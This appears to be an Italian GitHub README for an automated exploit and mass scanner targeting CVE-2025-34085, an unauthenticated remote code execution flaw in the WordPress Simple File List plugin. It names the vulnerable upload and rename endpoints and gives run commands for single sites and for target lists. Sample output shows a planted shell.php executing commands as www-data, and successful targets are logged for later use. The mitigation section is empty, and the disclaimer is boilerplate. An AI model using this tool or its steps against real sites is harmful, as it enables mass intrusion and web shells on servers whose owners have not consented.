
WordPress Simple File List Exploit RCE non autenticato
Uno strumento automatizzato di exploit e scanner per CVE-2025-34085, una vulnerabilità critica nel plugin WordPress Simple File List, che consente esecuzione remota di codice non autenticata tramite caricamento e ridenominazione arbitraria di file.
Caricamento di file non autenticato
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRidenominazione in estensione PHP
.php o simile tramite:/wp-content/plugins/simple-file-list/ee-file-engine.phpEsecuzione del Payload
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
Inserisci gli URL dei target in targets.txt (uno per riga), quindi esegui:
python3 CVE-2025-34085.py --cmd "whoami"
| Argomento | Descrizione |
|---|---|
-u | URL del target (es. http://example.com) |
--cmd | Comando da eseguire sulla shell remota (default: id) |
--inline | Usa payload inline (nessun parametro ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
I target riusciti vengono salvati in vuln.txt.
CVE-2025-34085.py — Script principale dell'exploittargets.txt — (Opzionale) Elenco dei domini targetvuln.txt — Log degli exploit riuscitiGli amministratori dovrebbero:
Questo progetto è inteso esclusivamente a scopi educativi e di test autorizzati. L'autore non si assume alcuna responsabilità per un uso improprio o danni causati da questo strumento.
Questo progetto è concesso in licenza secondo i termini della Licenza MIT. 📄 Visualizza il testo completo della licenza
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n